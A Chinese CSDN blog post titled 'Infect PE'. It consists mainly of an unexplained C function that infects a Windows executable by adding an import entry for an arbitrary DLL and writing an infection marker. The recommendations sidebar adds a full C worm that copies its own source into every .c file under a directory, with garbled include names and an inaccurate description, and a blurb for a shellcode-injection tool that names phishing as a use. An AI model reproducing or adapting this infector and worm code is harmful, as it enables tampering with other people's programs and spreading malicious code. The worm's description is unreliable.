Infect PE

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量377 收藏
点赞数
文章标签: image buffer file descriptor import header
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/butcher_elife/article/details/6735228
版权 
int InfectImport(const char* Path,const char* Library)
{
	char								 Sign[0x10]={0};
	FILE*								 File=0x0;
	char*								 Buffer=0x0;
	const char*							 Test=TEXT("Butcher's");
	unsigned long						 Size=0;
	unsigned long						 Offset=0;
	IMAGE_DOS_HEADER					 Dos={0};
	IMAGE_NT_HEADERS					 NT={0};
	IMAGE_SECTION_HEADER				 Section={0};
	IMAGE_IMPORT_DESCRIPTOR*			 Import=0;
	IMAGE_DATA_DIRECTORY*				 Directory=0;
	if (fopen_s(&File,Path,TEXT("rb+"))!=0)
	{
		return 0;
	}
	__try
	{
		__try
		{
			fread(&Dos,sizeof(IMAGE_DOS_HEADER),1,File);
			if (Dos.e_magic!= IMAGE_DOS_SIGNATURE)
			{
				return 0;
			}
			fseek(File,0x28,SEEK_SET);
			fread(Sign,0x10,1,File);
			if (strcmp(Test,Sign)==0)
			{
				return 0;
			}
			fseek(File,Dos.e_lfanew,SEEK_SET);
			fread(&NT,sizeof(IMAGE_NT_HEADERS),1,File);
			if (NT.Signature!=IMAGE_NT_SIGNATURE)
			{
				return 0;
			}
			fseek(File,Dos.e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
			fread(&Section,sizeof(IMAGE_SECTION_HEADER),1,File);
			if (Section.VirtualAddress!=NT.OptionalHeader.BaseOfData)
			{
				return 0;
			}
			Size=NT.OptionalHeader.DataDirectory[1].Size;
			if (Size+0x20>Section.SizeOfRawData-Section.Misc.VirtualSize)
			{
				return 0;
			}
			Offset=Section.PointerToRawData+Section.Misc.VirtualSize;
			Buffer=calloc(0x20,sizeof(char));
			memset(Buffer,0,0x20);
			strcpy_s((char*)Buffer,strlen(Library)+1,Library);
			*(int*)((int)Buffer+0x10)=0x80000001;
			*(int*)((int)Buffer+0x14)=0x0;
			*(int*)((int)Buffer+0x18)=0x0;
			*(int*)((int)Buffer+0x1c)=0x0;
			fseek(File,Offset,SEEK_SET);
			fwrite(Buffer,sizeof(char),0x20,File);
			Import=malloc(sizeof(IMAGE_IMPORT_DESCRIPTOR));
			Import->FirstThunk				=Offset+0x10;
			Import->ForwarderChain			=0;
			Import->Name					=Offset;
			Import->OriginalFirstThunk		=Offset+0x18;
			Import->TimeDateStamp			=0;
			fseek(File,NT.OptionalHeader.DataDirectory[1].VirtualAddress+Size-0x14,SEEK_SET);
			fwrite(Import,sizeof(IMAGE_IMPORT_DESCRIPTOR),1,File);
			Buffer=realloc(Buffer,Size);
			memset(Buffer,0,Size);
			fseek(File,NT.OptionalHeader.DataDirectory[1].VirtualAddress,SEEK_SET);
			fread(Buffer,sizeof(char),Size,File);
			fseek(File,Offset+0x20,SEEK_SET);
			fwrite(Buffer,sizeof(char),Size,File);
			Directory=malloc(sizeof(IMAGE_DATA_DIRECTORY));
			Directory->Size						=Size+0x14;
			Directory->VirtualAddress			=Offset+0x20;
			fseek(File,Dos.e_lfanew+sizeof(IMAGE_NT_HEADERS)-0x78,SEEK_SET);
			fwrite(Directory,sizeof(IMAGE_DATA_DIRECTORY),1,File);
			fseek(File,0x28,SEEK_SET);
			fwrite(Test,strlen(Test),1,File);
		}
		__except(EXCEPTION_EXECUTE_HANDLER)
		{
			return 0;
		}
	}
	__finally
	{
		free(Buffer);
		free(Import);
		free(Directory);
		fclose(File);
	}
	return 1;
}


 

butcher_elife
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
InfectImport
Ghjhfssfgk的博客
03-25 136
#include<Windows.h> #include"Image.h" #define INFECT_SIG ('PE') BOOL InfectImport( IN char* szImageFilePath, IN char* szDllName, IN char* szDllExportFunName ) { CImage Img; BOOL bResul...
憨憨也能写出PE病毒
bbszhenshuai的博客
05-18 2507
导语 这是我软件安全作业,希望对想要学习PE病毒编写的同学们有所帮助。 目标 编写一个PE文件传染程序infect.exe,功能要求如下: infect.exe运行后,向同目录下的notepad.exe程序植入“病毒载荷”代码. infect.exe不能重复传染notepad.exe. notepad.exe被植入“病毒载荷”后,具备如下行为:一旦执行,就会向其所在目录写入一个txt文件,文件名为:学号-姓名.txt,文件内容为空。注意:这里的姓名和学号要改为同学自己的名字和学号。 基本思路 infe
InfectPE-将自定义代码插入PE文件[此项目不再维护]-C/C++开发
05-26
使用此工具,您可以将x代码/ shellcode注入PE文件。 InjectPE仅适用于32位可执行文件。 为什么需要InjectPE? 您可以测试您的安全产品。 用于网络钓鱼活动。 了解如何PE注入使用此工具,您可以将x代码/ shellcode注入PE文件。 InjectPE仅适用于32位可执行文件。 为什么需要InjectPE? 您可以测试您的安全产品。 用于网络钓鱼活动。 了解PE注射的工作原理。 ...等等。 在项目中,有MessageBoxA的硬编码x代码,您可以更改它。 下载Windows x86二进制文件-硬编码的MessageBoxA x代码,仅用于演示。 依赖项:vc_redist.x86-Microsoft Visual C ++可再发行的用法。\ InfectPE.exe。
pe infect --扫雷里插入代码
09-11 1374
 作 者: tangwenbin时 间: 2008-08-27,19:36链 接: http://bbs.pediy.com/showthread.php?t=71517最近钻研了PE文件格式一段时间,想到写个程序测试一下自己的学习成果,费了九牛二虎之力写了个小程序,也算是作为学习后的一个小成果吧,写过这个程序也真正意识到汇编的作用,见缝插针啊。水平很菜,各位大侠不要笑话,错误之处,恳请批评指证。
PE文件的感染C++源代码
杨航的专栏
12-10 2895
PE文件的感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先
PE型感染病毒 —— VC源码
~ 飞 扬 的 天 空 ~
02-27 1793
狼哥的原话:“真正的文件型PE病毒,是不能发布调试版本的,只能靠自己的判断使用发布版本,就算要调试也只能使用其它的调试器,比喻说OllyDbg来调试发布版本......”   这类程序调试起来足矣让人精神紊乱,下面是全部的代码,有兴趣的看看吧.....     这是测试Test.dll源码: [cpp] view plaincopyprint? ///////
c语言pe文件感染,C语言怎么获得进程的PE文件信息
weixin_42613017的博客
05-26 127
一、打印Sections信息。下面的程序打印出Windows_Graphics_Programming 1.1中第三个程序“Hello World Version 3:Create a Full-Screen Window"生成的可执行文件的Sections结构字节的信息#include#includechar *strPath="C:/c1_hwv3/Debug/c1_hwv3.exe";int...
c语言pe添加区段,增加PE代码 (原创, ASM 实现)
weixin_31295867的博客
05-21 207
该楼层疑似违规已被系统折叠隐藏此楼查看此楼invokeGlobalAlloc,GPTR,[esi].OptionalHeader.SizeOfHeaders;开辟新的空间mov@lpMemory,eaxinvokeRtlMoveMemory,eax,_lpHead,[esi].OptionalHeader.SizeOfHeaders;复制旧头到新头movzxecx,[e...
A LITE VIRUS ABOUT PE INFECT (转)
csd3176的博客
12-12 125
A LITE VIRUS ABOUT PE INFECT (转)[@more@]请注意代码非我所有,我相信感兴趣的都能看懂 ^_^ ///////////////////////////////////////////////...
infect
03-06
Infect是一个基于bash的脚本,正式为termux用户制作,通过此工具,您只需发送链接即可传播android病毒。 此工具可在根目录为Android的设备和非根目录为Android的设备上使用。 适用于: Termux 测试于: Termux ...
Infect-me
03-13
"感染我"(Infect-me)项目似乎是一个与编程或网络安全相关的挑战,可能是为了帮助学习者了解计算机病毒或恶意软件的工作原理。项目构建时使用了特定的工具和技术,包括"Handlebars",这是一种模板引擎。下面我们将...
前端项目-infect.zip
09-03
《前端项目-infect.zip》是一个专注于前端开发的压缩包,主要包含一个名为“infect.js-master”的文件。这个项目的核心是“infect.js”,它是一个轻量级的库,旨在为任何Web项目引入依赖注入(Dependency Injection...
infect-master.zip
09-10
【标题】"infect-master.zip" 是一个与 Android 相关的源码压缩包,它可能包含一个Android应用或库的完整开发代码。这个压缩包的名称暗示了它可能涉及某种形式的感染或传播机制,这在编程领域可能指的是病毒、恶意...
PE文件感染程序设计(PE病毒)
Zyecho的博客
01-11 2658
记录PE病毒设计的入门实验
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
07-15
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
齐齐哈尔医学院考研,57个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
最新发布
07-15
齐齐哈尔医学院考研,57个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
龙年吉祥开门红PPT模板,适用于年度总结,工作总结
07-15
【作品名称】:龙年吉祥开门红PPT模板,适用于年度总结,工作总结 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
SQLServer内存使用分析方法.doc
07-15
数据库
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <sysat.h> #include <syspes.h> #include <unistd.h> #define FILENAME "worm.c" #define INFECTION_MARKER " #define INFECTION_MARKER" void infect_files(char *dir) { DIR *dp; struct dirent *entry; struct stat statbuf; FILE *fp, *infected_fp; char file_path[256], infected_file_path[256], line[512]; int infected = 0; if ((dp = opendir(dir)) == NULL) { perror("opendir"); return; } chdir(dir); while ((entry = readdir(dp)) != NULL) { lstat(entry->d_name, &statbuf); if (S_ISDIR(statbuf.st_mode)) { if (strcmp(".", entry->d_name) == 0 || strcmp("..", entry->d_name) == 0) { continue; } infect_files(entry->d_name); } else { if (strstr(entry->d_name, ".c") != NULL) { if ((fp = fopen(entry->d_name, "r")) != NULL) { while (fgets(line, sizeof(line), fp) != NULL) { if (strstr(line, INFECTION_MARKER) != NULL) { infected = 1; break; } } fclose(fp); if (!infected) { if ((fp = fopen(entry->d_name, "a")) != NULL) { if ((infected_fp = fopen(FILENAME, "r")) != NULL) { while (fgets(line, sizeof(line), infected_fp) != NULL) { fputs(line, fp); } fclose(infected_fp); } fclose(fp); infected = 1; } } } } } if (infected) { sprintf(file_path, "%s/%s", dir, entry->d_name); sprintf(infected_file_path, "%s/%s", dir, FILENAME); printf("Infected %s\n", file_path); link(file_path, infected_file_path); chmod(infected_file_path, S_IRUSR | S_IWUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH); infected = 0; } } chdir(".."); closedir(dp); } int main(int argc, char **argv) { char *dir; if (argc > 1) { dir = argv[1]; } else { dir = "."; } infect_files(dir); return 0; }
05-16
这是一个 C 语言编写的计算机蠕虫程序。其主要功能是递归遍历目录中的所有 C 语言源代码文件,并向其中注入一个宏定义,该宏定义会在程序运行时打开一个名为 "worm.c" 的文件,并将其中的代码复制到目标文件中。同时,该程序会在目标文件所在目录下创建一个名为 "worm.c" 的硬链接,以便在系统启动时自我复制和传播。这个程序是一种恶意软件,可能会对系统造成严重的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值